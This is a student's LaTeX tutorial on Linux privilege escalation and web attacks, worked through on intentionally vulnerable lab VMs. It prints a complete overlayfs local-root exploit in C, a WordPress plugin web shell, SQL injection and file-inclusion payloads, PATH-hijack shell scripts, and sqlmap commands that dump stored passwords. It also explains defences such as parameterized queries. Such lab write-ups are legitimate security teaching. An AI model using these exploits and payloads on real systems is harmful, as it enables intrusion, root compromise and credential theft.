\documentclass[12pt, letterpaper]{article}
\usepackage{graphicx}
\usepackage{float}
\usepackage{url}
\usepackage{minted}
\usepackage{textcomp}
\graphicspath{ {images/} }


\title{Privilege Escalation}
\author{Betim Bryma \thanks{thanks to the SBA-Research team for the support}}
\date{August 2016}
\begin{document}
\maketitle
\newpage

\tableofcontents

\newpage

\section{Introduction}
The term Privilege Escalation itself is fairly self explanatory. We have a system, and we have the privileges as a user. To escalate privileges means gaining access to the areas of the system where we didn't originally have access due to our privileges being lower than actually needed, or we might not have had privileges at all, and we escalate them in different manner, be it from a forgotten written password written in a post-it, up to maliciously exploiting privileged applications that were coded not using the safes techniques. In this paper I am going to go through the most common and popular privilege escalation techniques, by providing examples and step-by-step instructions. It is very important to fully grasp these concepts to try them on your own, but in order not to damage you computer, you should use a Virtual Machine. Here I am going to be using Ubuntu 14.04, which is an intentionally vulnerable Linux virtual machine because it runs exploitable services, but as far as privilege escalation is concerned, it does not have anything special, it is standard.
There are two different privilege escalations, the horizontal privilege escalation and the vertical one. The horizontal privilege escalation refers to the attacks that happen to the same user group, or namely to the group that has the same privileges as the attacker. Let us consider the example of the cloud management services that manage and store content from different users, and all these users are going to have the same privileges with one another in the server. A horizontal privilege escalation would be if one user accesses the account of another user in the server, so both of the accounts, the attacked one and the attacker's, have he same privileges, but the attacker managed to accesses another account without having enough privilege to do so. A vertical privilege, and that is what we are going to be dealing with in this paper, refers to gaining access to parts of the system or server that are above it's privileges in the privileges pyramid. If we consider the same example as before, a vertical privilege escalation would be gaining access to data that the administrators didn't intend for users of that user-privilege level, that would be for example the passwords database.
I am a student myself and as I am writing this paper, I am learning new things as well, so join me in our journey to learn as much as possible about privilege escalation. I would also like to note that as a beginner I learned a lot from this source \cite{beginPrivilege}\cite{cheatSheet}. In this paper we are going to go through all these privilege escalations, with examples and step by step instructions, but I should point out that this paper has educational purposes only. I believe that the information here should be used to protect yourself rather than try and attack other people.
\textit{Always do what is right. It will gratify half of mankind and astound the other.} 
Happy hacking.

\section{Environment Variables}
Environment variables are a set of strings that are used by processes to define their behavior. Environment variables are inherited from parent processes, and can be modified and then passed to the children processes and so on. If one is not careful a lot of exploits can happen because of the environment variables malicious or unsafe modifications.

\subsection{\$PATH variable}
The $PATH$ variable is the variable that the computer uses to find the executable files, because having to write the full path every single time for a every single program that one want to run, is cumbersome, and so is having to search in every single directory for files to check for the executable file. So instead in the $PATH$ variable we have saved the places where the computer is going to look for when searching for an executable, for example in the Virtual Machine that I am currently using is 
\begin{minted}{bash}
echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:
/usr/local/games:/snap/bin
\end{minted}
Now what would happen if '.' was included in the $PATH$ variable as well? The computer would look in the current directory as well whenever a user types a command, so if it finds a program with that name in the current directory, then it stops looking for more. What would be a command that is very often used, and easy to replicate it's function, while doing something malicious as well? It's the  $ls$ command. I am going to demonstrate just how easy it is to manipulate the computer and make the user think that it is \textit{indeed} using the legit command. Let me just a very short program and call it lsi, that is going to replicate the output of the $ls$ command.
\begin{minted}{c}
int main(void){
	printf("%s\n","Custom made");
    system("ls");
    
    return 0;
}
\end{minted}

\begin{figure}[H]
  \centering
  \includegraphics[width=\textwidth]{images/PATH}
  \caption{The lsi command}
\end{figure}

Now lsi in fact doesn't do anything dangerous. It's purpose is to demonstrate how easy it is to trick the user into thinking that it is running a program when the "." in the path. What would happen if I called the program $ls$ instead of \textit{lsi}? Then the program goes into an endless recursive call loop, because the $system("ls")$ tells the system to call the $ls$ program, and based on the $PATH$ variable the first location that the system looks in is the current working directory, and then when it calls that program, that also calls another instance of itself and so on and so on. Now since it was this easy to make a program that looks like the real deal, how hard is it really to replicate what ls does, and then do something \textit{malicious} in the background? Fairly easy I'd say. Below I have included a script that is specifically made for privilege escalation \cite{becomingRoot} and it works on Ubuntu 14.04, all that is needed is to run the script and \textit{voilà} we have root access. The purpose of this is to demonstrate that once we trick the user into thinking that he or she is running a legit command, that we can run another script in background, gain root access, and then do whatever that we want on the exploited system.

\begin{minted}{c}
static char child_stack[1024*1024];
 
static int
child_exec(void *stuff)
{
    char *file;
    system("rm -rf /tmp/ns_sploit");
    mkdir("/tmp/ns_sploit", 0777);
    mkdir("/tmp/ns_sploit/work", 0777);
    mkdir("/tmp/ns_sploit/upper",0777);
    mkdir("/tmp/ns_sploit/o",0777);
 
    fprintf(stderr,"mount #1\n");
    if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/proc/sys/kernel,upperdir=/tmp/ns_sploit/upper") != 0) {
// workdir= and "overlay" is needed on newer kernels, also can't use /proc as lower
        if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/sys/kernel/security/apparmor,upperdir=/tmp/ns_sploit/upper,workdir=/tmp/ns_sploit/work") != 0) {
            fprintf(stderr, "no FS_USERNS_MOUNT for overlayfs on this kernel\n");
            exit(-1);
        }
        file = ".access";
        chmod("/tmp/ns_sploit/work/work",0777);
    } else file = "ns_last_pid";
 
    chdir("/tmp/ns_sploit/o");
    rename(file,"ld.so.preload");
 
    chdir("/");
    umount("/tmp/ns_sploit/o");
    fprintf(stderr,"mount #2\n");
    if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc") != 0) {
        if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc,workdir=/tmp/ns_sploit/work") != 0) {
            exit(-1);
        }
        chmod("/tmp/ns_sploit/work/work",0777);
    }
 
    chmod("/tmp/ns_sploit/o/ld.so.preload",0777);
    umount("/tmp/ns_sploit/o");
}
 
int
main(int argc, char **argv)
{
    int status, fd, lib;
    pid_t wrapper, init;
    int clone_flags = CLONE_NEWNS | SIGCHLD;
 
    fprintf(stderr,"spawning threads\n");
 
    if((wrapper = fork()) == 0) {
        if(unshare(CLONE_NEWUSER) != 0)
            fprintf(stderr, "failed to create new user namespace\n");
 
        if((init = fork()) == 0) {
            pid_t pid =
                clone(child_exec, child_stack + (1024*1024), clone_flags, NULL);
            if(pid $\langle  0) {
                fprintf(stderr, "failed to create new mount namespace\n");
                exit(-1);
            }
 
            waitpid(pid, &status, 0);
 
        }
 
        waitpid(init, &status, 0);
        return 0;
    }
 
    usleep(300000);
 
    wait(NULL);
 
    fprintf(stderr,"child threads done\n");
 
    fd = open("/etc/ld.so.preload",O_WRONLY);
 
    if(fd == -1) {
        fprintf(stderr,"exploit failed\n");
        exit(-1);
    }
 
    fprintf(stderr,"/etc/ld.so.preload created\n");
    fprintf(stderr,"creating shared library\n");
    lib = open("/tmp/ofs-lib.c",O_CREAT|O_WRONLY,0777);
    write(lib,LIB,strlen(LIB));
    close(lib);
    lib = system("gcc -fPIC -shared -o /tmp/ofs-lib.so /tmp/ofs-lib.c -ldl -w");
    if(lib != 0) {
        fprintf(stderr,"couldn't create dynamic library\n");
        exit(-1);
    }
    write(fd,"/tmp/ofs-lib.so\n",16);
    close(fd);
    system("rm -rf /tmp/ns_sploit /tmp/ofs-lib.c");
    execl("/bin/su","su",NULL);
}
\end{minted}

\begin{figure}[H]
  \centering
  \includegraphics[width=\textwidth]{images/root}
  \caption{Running the code from above}
\end{figure}

So all in all not to be tricked we can see that the safes way that there is is to make sure that the '.' is \textbf{never, ever} included in $PATH$, and that we should always use the full path to the executable. But even then, it is not guaranteed that we are running the legit version either. More on that on the next section.


\subsection{\$IFS variable}
The internal field separator ($IFS$) is pretty self-explanatory from the name itself. It is used to separate a command into tokens, when it encounters some specific characters, and those characters are saved in this variable of course. It usually includes space, tab, and the newline. The main idea behind the $IFS$ variable exploit it to use the '/' character, so whenever a program calls a program such as /bin/ls, the computer is going to interpret it, if the '/' character is in $IFS$, as bin ls, similarly had $IFS$ been '-' then for example the program ps-aux would be ps aux and so on, you get the idea. Now we are going to be using the $PATH$ exploit here aswell that was described in the previous section. Since I already added the '.' in the $PATH$ variable I am not going to be adding anything else since I will be working in the home directory, but you should add your home directory to the $PATH$ variable if you want to use this trick everywhere else and not just in the home directory. I have to explain a little bit the SUID bit as well, but I am going to go into more details in the next section. A SUID bit is basically a bit, that tells the system to execute that program with the permissions of the owner, and not with the permissions of the current user. Theoretically this is a good idea, but in practice if a program has SUID bit set, and it is poorly coded, that can be very dangerous. Now back to the $IFS$ variable, to add the '/' into the \$IFS variable (again I assume that these are done in a safe Virtual Machine and not in the main one), you can do it so: IFS=\\ and then \textit{export IFS}. So since now we have modified the IFS variable we have to find a program with SUID set, and then examine what that program is executing. It is sufficient that it is executing as root, and something that begins with /bin/.... because by the way that we have modified the $IFS$ variable the system is going to read it like so: bin token token token and so on. So if you cannot find a SUID program with those conditions, why not write one?

\begin{minted}{c}
int main(void){
	system("/bin/ls");
	return 0;
}
\end{minted}

So we are now going to be using the same program that we wrote before to use for the PATH variable exploit, we just added the full path in this case, to demonstrate that even when the full path is used, there is still some possibility for exploit.
Lets write a script that is going to serve as a shell as well:

\begin{minted}{bash}
#!/bin/bash
/bin/sh
\end{minted}

And finally I am going to compile and link this as a root, because I want the owner of the file to be set as root, and I am going to set the SUIT bit as well (chmod u+s -insert name here-). After this when we run the lsi (the executable file that I linked from our program) it is going to be redirected to our bin, and since the executable had a SUID with root as owner, we are now running as root as well.
However you should keep in mind that this may not always work, IFS is not as powerful as people believe that it is, so depending in the implementation, your system might completely ignore the variable and set it's own values. "If IFS is not set, it shall behave as normal for an unset variable, except that field splitting by the shell and line splitting by the read command shall be performed as if the value of IFS is $\langle space \rangle$ $\langle tab \rangle$ $\langle newline \rangle$; see Field Splitting.
Implementations may ignore the value of IFS in the environment, or the absence of IFS from the environment, at the time the shell is invoked, in which case the shell shall set IFS to $\langle space \rangle$ $\langle tab \rangle$ $\langle newline \rangle$ when it is invoked."\cite{POSIX}. Here is an interesting article that explains why IFS exists and also why it is dangerous.\cite{IFS}

\subsection{\$LD\_LIBRARY\_PATH variable}
A lot of programs need to use other programs when they are running, and that's when the libraries come into play. Libraries are programs that programs can use that provide generic functionality, meaning that they can be used by other programs as well, no matter what context, that is usually the case anyway. So one program can statically bind with all the standard libraries that it uses, and so can the other, and the other one and so on. But if most of them are using standard libraries, isn't it a waste of memory to pass have so much duplicate code? It is, hence most of the modern computers nowadays support the concept of dynamic binding.\cite{library}
Dynamically linked libraries have its security risks as well as I will demonstrate it now as well. I am going to assume that the $PATH$ variable is still leaded by the home directory as I set it in a previous section. This attacks concerns the files that end with .so, by modifying the LD\_LIBRARY\_PATH variable and adding programs there with the same as what the original program wants to use. This is only useful when the program that we want to exploit has a SUID bit set, so that way when it calls the custom program, the program than gains root permissions (if root is the owner of the exploited program of course. I should also point out that this is a fairly old attack, and it is not going to work on most of the modern operating systems, since they completely ignore this variable when a program is running that has SUID bit set, but it is going to work on the old ones most probably. The following code did not work on my virtual machine, but it may work on a older one, but I could not test that.\cite{beginPrivilege}


\section{SQL injection}
In this section I am going to be talking about the SQL injection since, in my opinion, it is the easiest and the most fun one. Unfortunately I cannot provide a website where one can do privilege escalations, as I do not own one, and I cannot do them on another website that I do not own, obviously for legal reasons. Instead I am going to provide some of my solutions that I did for an assignment for a security class at my university, TU Wien, but they are going to be a little bit modified, and I should also point out that the website is purposely made weak so that it is possible for us to do SQL injection. I am going to assume that the reader has at least some basic knowledge of SQL in order to understand what is going on here. If not, I believe that a 20-30 minutes tutorial on SQL is going to be sufficient to be able and follow along. I am not going to be explaining SQL, as that is out of the scope of this paper.

\subsection{Bypassing login}
Let us start with the most basic form of SQL injection, that is the login bypassing.
In order to log in on this website that requires an username, and a password that we do not have, we have to bypass the login-in system, and that is really easy because whenever you type the username in the form, the website is quite literally asking the database is there a username with the name $\langle the name that you insert \rangle$ and password $\langle the password that you insert \rangle$, so then we can trick the database with a command like this 1' or 1=1 --  because then the SQL statement looks something like this 
\begin{minted}{SQL}
SELECT * FROM users WHERE name='1' or 1=1 -- -' and password=’’'
\end{minted}
So the query tricks the statement by commenting out the rest, where the password would have been normally asked for. Let's give it a try.

\begin{figure}[H]
  \centering
  \includegraphics[width=\textwidth]{images/image01}
  \caption{Trying to login without a password or a username}
\end{figure}


And so now we got in without knowing the username or the password! 

\begin{figure}[H]
  \centering
  \includegraphics[width=\textwidth]{images/image03}
  \caption{Successfully got in the system now}
\end{figure}

\subsection{Exploiting}
So now after we got in, we are going to exploit as much as possible. First we click on the provided link that says to proceed to the accounts, but when we do, we get a message that says that the accountno was not provided. That is excellent because that way we can extrapolate that there is an attribute called accountno, and we are going to use that information now. 

\begin{figure}[H]
  \centering
  \includegraphics[width=\textwidth]{images/image03}
  \caption{accountno is not provided}
\end{figure}

Since we do not know what the accountno is, but we can see that it is asking for it in the link, we realize that we can use the same trick as before to get in. I am going to append 'accountno=null  OR 1=1' to the end of the link because in this case it is irrelevant if accountno=null exists, or even if it is the value that it is looking for, because the OR 1=1 (which is always true) tricks the database into thinking that the condition is fulfilled and voilà we can see the list of the members now. But what if we also want to find out which one has the highest balance? let's append accountno=null  OR 1=1 order by balance desc to the end of the link and let the database give us a hint, even though ti is not displaying the balances of the users, we now that someone named 'Ahmad Lawson' has the highest balance.
I assume that in order to get the balance information we would have to JOIN with another table, but how can we join if we don't know the other tables name? We can try and guess the balance, by appending a 'AND balance  $<$ 10', and then you continue to add zeros, and then you’re are 100000, if you add one more zero, the list is blank, so you just change the one into a two, and so on until we’re at 261000 
we get a blank list, so instead of ‘<’ we put ‘=’ and we get Ahmad, so we guessed his balance. It may not be efficient, or even always possible, but we had no other choice in this case. So now let us append \textit{accountno=null OR 1=1 and balance = 261000} in the end of the link, to get the result, confirming how much money Ahmad has in his bank account.

\begin{figure}[H]
  \centering
  \includegraphics[width=\textwidth]{images/image00}
  \caption{The member list ordered by who has the highest balance}
\end{figure}



\begin{figure}[H]
  \centering
  \includegraphics[width=\textwidth]{images/image08}
  \caption{The member with the highest balance}
\end{figure}

So now we continue to find the member number of this member. I should point out that for the next step we had to know the table names, they were provided in the assignment, namely vip and regular, but even if they are now provided there are many techniques how one can get the names, social engineering is the first one the comes to my mind. To get a list of all the member we are going to UNION those two tables. By the same logic that we used before we are going to append 'memberno=null or 1=1 UNION SELECT name from vip' to the end of the link to get a list of all the regular members together with the ones from VIP.

\begin{figure}[H]
  \centering
  \includegraphics[width=\textwidth]{images/image05}
  \caption{The members of the regular and VIP table}
\end{figure}

And now all that is left to do is ask for a list of the members of the VIP table, but this time we are going to SELECT the memberno and not the name. Since we saw Ahmad's position in the previous picture, we now know the memberno of Ahmad as well, it is 888888. So we went, from a log-in screen where we didn't even know a single username, let it alone a password, to getting a list of all the members of the website, together with the information on who has the highest balance and it's member number.

\begin{figure}[H]
  \centering
  \includegraphics[width=\textwidth]{images/image02}
  \caption{The member numbers of the VIP table}
\end{figure}

The user input should never simply get appended to form the SQL statement and sent to the database. There is a fairly easy way to implement this, and that is by using parameterized statements, where placeholders are used for parameters (usually ?) and the parameter values are supplied during execution time.
The following example should make this a little bit more clear.
\begin{minted}{sql}
SELECT balance FROM regular WHERE accountno = '$\langle user_input \rangle$'
\end{minted}

\begin{minted}{sql}
SELECT balance FROM regular WHERE accountno = ?
\end{minted}

\begin{figure}[H]
  \centering
  \includegraphics[width=\textwidth]{images/exploits_of_a_mom}
  \caption{Parent of the year}
\end{figure}

\section{SUID}
As I mentioned in the beginning setuid files or files that have SUID bit set can be dangerous, executable files if I'm a little bit more precise. What the SUID bit allows the system to do is to run an executable with the permissions of the owner, and not of the current user that want to run the executable file. So let's say I have an standard account that's called betim, I am able to execute an executable that has SUID bit set, and that executable is going to run with permissions of root, and not betim! This is usually very handy, in the sense that some operations require root permissions, and not all the users have those permissions, or even the root password, so when installing such programs, you need to be root, in order to have SUID bit set, and the owner to be root. Here comes the interesting part, on why it is dangerous. Well if it isn't obvious, if a program was coded badly and has SUID, then we can exploit that program and gain root access. That is the main problem with SUID files in a nutshell. 
Since I am very much new to this field, the following sections are going to be what I was able to learn by reading different walk-throughs and tutorials, and then that way I was able to learn how to do so many new things, and so I have documented them all here.

\subsection{Mr. Robot}
To explain the SUID issues, I am going to be using a virtual machine that is called Mr. Robot. This virtual machine is available in a website that has many more purposely vulnerable virtual machines, for the people to exercise on them, and most of them are in the form of a game\cite{vulnhub}. Here I am going to be using Mr. Robot, and the challenge is to find three different keys, but since we don't really care about winning a game, we are going to skip that part, and we want to access the virtual machine from the outside, and then gain root access VM\cite{mrRobot}
When it first starts we get 0 clues about how to log-in. I tried the obvious admin admin, mr.robot mr.robot, root root and so on but they do not work. Not surprising.
\begin{figure}[H]
  \centering
  \includegraphics[width=\textwidth]{images/mrRobot}
  \caption{Start screen}
\end{figure}

So my next step was to find the IP address by using netdiscover, and I found out that the IP address is 192.168.20.41. 
\begin{figure}[H]
  \centering
  \includegraphics[scale=0.35]{images/netdiscover}
  \caption{netdiscover}
\end{figure}
And now that we got the address, let us run nmap and see what can we exploit from that one as well. Now so we can tell that it is running web services on port 80 and on port 443.
\begin{figure}[H]
  \centering
  \includegraphics[scale=0.35]{images/nmap}
  \caption{nmap}
\end{figure}
Let's access the ip address at port 80 and see how it looks like!
\begin{figure}[H]
  \centering
  \includegraphics[width=\textwidth]{images/homepage}
  \caption{homepage}
\end{figure}
The site is very beautiful indeed, and it is very similar to the whoismrrobot.com. I tried to exploit something from the page, but I got nothing, therefore I decided to run nikto and see if we can find any useful files.


\begin{figure}[H]
  \centering
  \includegraphics[width=\textwidth]{images/nikto}
  \caption{nikto}
\end{figure}

The most relevant thing to us the nikto was able to find is the wordpress page, and let's try and access that at the ipaddress/wp-login:
\begin{figure}[H]
  \centering
  \includegraphics[scale=0.35]{images/wp-login}
  \caption{WordPress login page}
\end{figure}
Again after a few tries no success, but I was able to guess the username, because it says wrong password provided for \textit{username}, so we know that now we only need somehow to find elliot's password, or even another username with the password. I could use the  dictionary that was found from nikto to brute force the passwords, with either hydra or wpscan, or I can brute fore the directories of the page. I decided for the later since I might find something even more useful so. After running 
\begin{minted}{bash}
python wfuzz.py -w ~/Downloads/fsocity.dic-unique 
--sc=200 http://192.168.20.41/FUZZ
\end{minted}
And then after examining each of the files, the rest turn out to be interesting, but not useful, except for the license file. That is a long file with three lines, and each of them have a huge amount of newlines in-between. So in the bottom of the file we found a base64 encoded text.

\begin{figure}[H]
  \centering
  \includegraphics[width=\textwidth]{images/fs1}
  \caption{the first part}
\end{figure}

\begin{figure}[H]
  \centering
  \includegraphics[scale=0.9]{images/fs2}
  \caption{the second part}
\end{figure}

\begin{figure}[H]
  \centering
  \includegraphics[scale=0.9]{images/fs3}
  \caption{the third part}
\end{figure}

\begin{figure}[H]
  \centering
  \includegraphics[width=\textwidth]{images/encode}
  \caption{The decoded text that shows the username and the password}
\end{figure}

Okay so now we officially have got the username and the password, and now we can access the wordpress page, where we can see that elliot has admin rights, and therefore he can manage plugins, which means that we can upload our own custom plugins and exploit the site from there.
Now let's use a very simple and short php script that is going to make it possible for us, to execute shell commands. The script need just one line, but we also have to include on top the normal information that wordpress needs, and then zip that script, go to the plugins, add a new plugin, and then you install the plugin and afterwards if the installation was successful (it lets you know) you should activate the plugin.
\begin{figure}[H]
  \centering
  \includegraphics[width=\textwidth]{images/wp-home}
  \caption{Wordpress page}
\end{figure}


\begin{minted}{php}
<?php  
/*
Author: Betim Bryma
Plugin Name: Shell  
Plugin URI: https://betimbryma.com/  
Description: Used as a 'reverse' shell script for Mr. Robot  
Version: 0.0.1  
Author URI: https://betimbryma.com/  
*/

echo shell_exec($_GET['e']);  
\end{minted}
And so it is possible for us to run shell commands, so I started looking around for file, I went to the home directory and looked if I could see anything interesting, and I did. 
\begin{figure}[H]
  \centering
  \includegraphics[scale=0.6]{images/user-daemon}
  \caption{Wordpress page}
\end{figure}
So now all that I needed to do is cat the file, and then google (or Bing) to find some md5 decoder, I used that and I found out that the password is abcdefghijklmnopqrstuvwxyz and the user name robot. So now we have all that we need to log in into the VM, but we are not going to be as root, therefore I am going to use SUID files to exploit and escalate our privileges.
\begin{figure}[H]
  \centering
  \includegraphics[width=\textwidth]{images/got-in}
  \caption{Wordpress page}
\end{figure}
The main thing that we need to know when we want to exploit by using SUID files, is which files have setuid bit set! So let's search for those files and see if we can find anything interesting! 
After running the search we can see that there are multiple SUID files, but the most interesting one for us is going to be nmap, why would nmap need SUID bit set after all? After checking the version of nmap we see that it is a very outdated version, it is version 3.81 where the actual version as of the time that I am writing this is 7.x. After some research I found out that the older versions of nmap had a command called interactive that would allow users to access shell, so all that was needed to do was to use the command !shell and we had shell access. As root. So there it is, we exploited completely the virtual machine, we did not find the keys that the challenge asked for because that was unimportant for us, we wanted to gain privilege escalation, and we did that.
\begin{figure}[H]
  \centering
  \includegraphics[width=\textwidth]{images/shell}
  \caption{nmap shell}
\end{figure}

\subsection{PwnLab: init}
We continue with the next VM and that is PwnLab-Init\cite{pwn-int}. As with most of the VM machines that I have seen lately it starts off with exploiting the website and then gaining further rights, and this one is no different. Once we start the machine, we first see which IP address it is using by using netdiscover, and then by using nmap we are going to see which ports does it use, and which services as well to get as much information as possible. After I scanned it with nmap, I got the report and I could see that it uses port 80, which meant that I could go straight to the browser and type in the address and that was going to lead me to a website, that was apparently about image hosting, but the trick here was that we couldn't upload anything else without being logged in first, and that was something that we lacked.
\begin{figure}[H]
  \centering
  \includegraphics[width=\textwidth]{images/pwn-homepage}
  \caption{homepage}
\end{figure}
And the very next thing that I did afterwards was a scanning with Nikto to see if we can find anything thing interesting. And we were able to find a couple of interesting file that could possible lead us to a successful local file inclusions attack.

\begin{figure}[H]
  \centering
  \includegraphics[width=\textwidth]{images/pwn-nikto}
  \caption{nikto}
\end{figure}
There is a php method that encodes stuff in base 64 and sometimes we can get information out of that, information that we normally wouldn't be able to get. So I went ahead and used the following command curl http://192.168.20.3/?page=php://filter/convert.base64-encode/resource=index which then gives us the following result:

\begin{minted}{html}
<html>
<head>
<title>PwnLab Intranet Image Hosting</title>
</head>
<body>
<center>
<img src="images/pwnlab.png"><br />
[ <a href="/">Home</a> ] [ <a href="?page=login">Login</a> ] [ 
<a href="?page=upload">Upload</a> ]
<hr/><br/>
PD9waHANCi8vTXVsdGlsaW5ndWFsLiBOb3QgaW1wbGVtZW50ZWQgeWV0Lg0KLy9z
ZXRjb29raWUoImxhbmciLCJlbi5sYW5nLnBocCIpOw0KaWYgKGlzc2V0KCRfQ09P
S0lFWydsYW5nJ10pKQ0Kew0KCWluY2x1ZGUoImxhbmcvIi4kX0NPT0tJRVsnbGFu
ZyddKTsNCn0NCi8vIE5vdCBpbXBsZW1lbnRlZCB5ZXQuDQo/Pg0KPGh0bWw+DQo8
aGVhZD4NCjx0aXRsZT5Qd25MYWIgSW50cmFuZXQgSW1hZ2UgSG9zdGluZzwvdGl0
bGU+DQo8L2hlYWQ+DQo8Ym9keT4NCjxjZW50ZXI+DQo8aW1nIHNyYz0iaW1hZ2Vz
L3B3bmxhYi5wbmciPjxiciAvPg0KWyA8YSBocmVmPSIvIj5Ib21lPC9hPiBdIFsg
PGEgaHJlZj0iP3BhZ2U9bG9naW4iPkxvZ2luPC9hPiBdIFsgPGEgaHJlZj0iP3Bh
Z2U9dXBsb2FkIj5VcGxvYWQ8L2E+IF0NCjxoci8+PGJyLz4NCjw/cGhwDQoJaWYg
KGlzc2V0KCRfR0VUWydwYWdlJ10pKQ0KCXsNCgkJaW5jbHVkZSgkX0dFVFsncGFn
ZSddLiIucGhwIik7DQoJfQ0KCWVsc2UNCgl7DQoJCWVjaG8gIlVzZSB0aGlzIHNl
cnZlciB0byB1cGxvYWQgYW5kIHNoYXJlIGltYWdlIGZpbGVzIGluc2lkZSB0aGUg
aW50cmFuZXQiOw0KCX0NCj8+DQo8L2NlbnRlcj4NCjwvYm9keT4NCjwvaHRtbD4=
</center>
</body>
</html>
\end{minted}

So now we are going to decode the encoded part in whatever that we find in Google, I just clicked on the first link. After it is decoded we get a php script, that after examination we can conclude that the lang coockie is not being properly sanitized, and that means that we can put in there whatever we want, even a reverse php script, we just have to take care of the extension, it has to be something like jpg or gif, and the headers need to be taken care of, for example I just put GIF98 on top of the script, and changed the name to betim.gif (yes, I am that creative) and everything worked just fine, the website did not complain when I uploaded the script, however, because I am using this VM just to escalate privileges via SUID files, the part of the script is rather unnecessary, and therefore I am not going to be covering here. It is pretty easy actually, I simply used the reverse script from monkeypentest. Now if we check for the config file as well, we are going to gain some pretty valuable information, on how to log into the mysql database (we know that it is mysql because of the nmap scan). curl http://192.168.20.3/?page=php://filter/convert.base64-encode/resource=config is going to give us a script, and after decoding the encoded part, we are going to get: 

\begin{figure}[H]
  \centering
  \includegraphics[width=\textwidth]{images/pwn-echo}
  \caption{the database admin}
\end{figure}

Bingo! So now we can log in into the database, and with simple commands such as 
\begin{minted}{sql}
SHOW tables;
\end{minted}
we get the information on what tables we have currently in this database. And after seeing that the database has a table called users, let's see what that table has now:
\begin{figure}[H]
  \centering
  \includegraphics[scale=0.6]{images/pwn-users}
  \caption{the users of the website}
\end{figure}
Since this seems a pretty valuable information, I am now going to check whether I can access the passwd file, because if I can, I can see the users that way, and if I can find the same users there as well, chances are high that I can log in with one of the users and their respective passwords, after I have decided them from the base64 encoding that they have. Now let's use the fact that the lang cookie is not properly sanitized, and try and access the passwd file from that. 

\begin{figure}[H]
  \centering
  \includegraphics[width=\textwidth]{images/pwn-passwd}
  \caption{the passwd file}
\end{figure}
So since we can see the three users that we found in the database as well, namely Kane, Mike and Kent, I am going to decode their passwords and then try and see if I can log in to the virtual machine by using one the users, and I am going to choose Kane.
\begin{figure}[H]
  \centering
  \includegraphics[scale=0.35]{images/pwn-kane}
  \caption{Logged in into the Virtual Machine}
\end{figure}

So as always the first thing that we do is run a search, to see what SUID files can we find, and of course the searching starts from the root directory, and goes up to every place where it has enough permissions to do so. After the scanning is done, we can see that there is a file with SUID bit set called mikemsg in the home directory of Kane.

\begin{figure}[H]
  \centering
  \includegraphics[scale=0.35]{images/pwn-msgmike}
  \caption{mikemsg}
\end{figure}
And after trying to run the file we are going to see that the file uses the cat command because it is giving an error output, and that's how we get the hint that it is using that particular command.

\begin{figure}[H]
  \centering
  \includegraphics[width=\textwidth]{images/pwn-cat}
  \caption{running mikemsg}
\end{figure}
Now this is going to make our job very easy to escalate our privileges to those of the owner of mikemsg, namely Mike. I am going to be using the same trick that we used in the very beginning, that s by adding the period on the PATH variable, and that makes the system look for the files in the current directory first, and then on the other directories, and since we already know that it is using the cat command, we are going to write a very short script that is going to serve as shell, the same one that we did earlier, and then we are going to be calling that cat, so when mikemsg calls the cat command, the computer is going to looks first in the current directory for a file called cat, and it is going to find out \textit{malicious} script.

\begin{minted}{bash}
#!/bin/bash
/bin/sh
\end{minted}

\begin{figure}[H]
  \centering
  \includegraphics[width=\textwidth]{images/pwn-bash}
  \caption{running as mike}
\end{figure}

\subsection{VulnOS: 2}
The next Vulnerable machine that I am going to be exploiting is VulnOS2 \cite{VulnOS}. As usually we start off by scanning the network with netdiscover to find the IP address because we don't know it, and then after we get the IP address we are going to be scanning with nmap to see the services that it is using and it's ports.
\begin{figure}[H]
  \centering
  \includegraphics[width=\textwidth]{images/vulnos-nmap}
  \caption{nmap results}
\end{figure}
So now we see that it uses HTTP and ssh as well. Let's head to the browser and see if we can find anything interesting over there. Once we go the website and examining every tab manually we find the interesting part in the documentation part, in fact it is hidden, because it has the same color as the background so one cannot see it without selecting it with mouse, or without inspecting the source, and that is what I did.
\begin{figure}[H]
  \centering
  \includegraphics[width=\textwidth]{images/vulnos-html}
  \caption{the source of the documentation tab}
\end{figure}
And after that once we head over to the address that it is telling us to head, we can see that it is using a pretty outdated version of OpenDocMan, namely v1.2.7. So instead of trying to log in with the information provided (username: guest, password: guest) we are going to search whether there are exploits that attack this particular version of OpenDocMan, and there are indeed! This was the first one that I could find \cite{vulnos-exploit}.
So now let's examine the database by using the following command
\begin{minted}{bash}
sqlmap -u 'http://192.168.20.21/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user'
--dbs
\end{minted}
which is going to give us the available databases and their respective names.
\begin{figure}[H]
  \centering
  \includegraphics[scale=0.6]{images/vulnos-db}
  \caption{the available databases}
\end{figure}
Let's continue now with jabcd0cs and see what tables are in that database
\begin{minted}{bash}
sqlmap -u 'http://192.168.20.21/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user' -D 
jabcd0cs --tables --level=3 --risk=1
\end{minted}
\begin{figure}[H]
  \centering
  \includegraphics[scale=0.6]{images/vulnos-tables}
  \caption{the available tables in jabcd0cs}
\end{figure}
Let's see the attributes of the table now, so that way we know what we can select, and what we cant.
\begin{minted}{bash}
sqlmap -u 'http://192.168.20.21/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user' -D 
jabcd0cs -T odm_user --columns --level=3 --risk=1
\end{minted}
\begin{figure}[H]
  \centering
  \includegraphics[scale=0.6]{images/vulnos-attributes}
  \caption{the attributes in odm\_user}
\end{figure}
And now back to the interesting part! Let's get some interesting information such as usernames and passwords! 
\begin{minted}{bash}
sqlmap -u 'http://192.168.20.21/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user' -D 
jabcd0cs -T odm_user -C username,password --dump --level=3 --risk=1
\end{minted}
\begin{figure}[H]
  \centering
  \includegraphics[scale=0.6]{images/vulnos-usernames}
  \caption{the usernames and their respective passwords in odm\_user}
\end{figure}
